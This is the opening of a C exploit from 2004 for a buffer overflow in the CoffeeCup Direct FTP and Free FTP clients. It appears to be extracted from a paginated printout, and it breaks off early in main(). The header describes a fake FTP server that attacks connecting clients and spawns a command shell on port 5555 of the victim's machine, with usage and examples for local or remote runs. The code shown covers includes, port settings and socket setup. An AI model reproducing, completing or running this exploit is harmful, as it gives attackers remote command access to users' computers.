1 /*************************************************************************************
2
3
CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
4
created by Komrade
5
e−mail: unsecure(at)altervista(dot)org
6
web:
http://unsecure.altervista.org
7
8
Tested on:
9
CoffeeCup Direct FTP 6.2.0.62
10 CoffeeCup Free FTP 3.0.0.10
11
12 on a Windows XP Professional sp2 operating system.
13
14
This exploit creates a fake FTP server on your machine, waiting for the
15
connection of an FTP client.
16
After the exploit is sent a shell (command prompt) is spawn on port 5555
17
of the target machine.
18
This exploit works locally or remotely.
19
20
Usage: coffecupbof [direct | free] [−l] [−r server IP]
21
22
Options:
23
direct | free "direct" to exploit a CoffeeCup Direct FTP client
24
"free" to exploit a CoffeeCup Free FTP client
25
−l
executed locally
26
−r serverIP
executed remotely. You need to specify the address
27
of the FTP server for the PASV command (Insert your IP address)
28
29
Examples:
30
31
C:\> coffeecupbof direct −l
exploit for CoffeeCup Direct FTP executed locally
32
C:\> coffeecupbof free −r 10.0.0.1 exploit for CoffeeCup Free FTP executed remotely
33
34 *****************************************************************************************/
35
36 #include <stdio.h>
37 #include <string.h>
38 #include <windows.h>
39 #include <winsock.h>
40
41 #define FTP_PORT 21
42 #define PASV_PORT 1106
43
44 int version, wait = TRUE;
45
46 DWORD WINAPI fileList(LPVOID data);
47
48 int main(int argc,char **argv){
49
50
SOCKET sock, client;
51
struct sockaddr_in sock_addr,client_addr;
52
WSADATA data;
Page 1/7
CoffeeCup FTP Clients Direct 6.2.0.62 Free 3.0.0.10 BoF Exploit
Komrade
11/22/2004
53
WORD p;
54
char mess[4096], received[512], addr[32];
55
int lun, n, i, err;
56
HANDLE fileListH;
57
DWORD fileListId, exitCode;
58
59
p = MAKEWORD(2, 0);
60
WSAStartup(p, &data);
61
62
printf("−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\r\n");
63
printf("\tCoff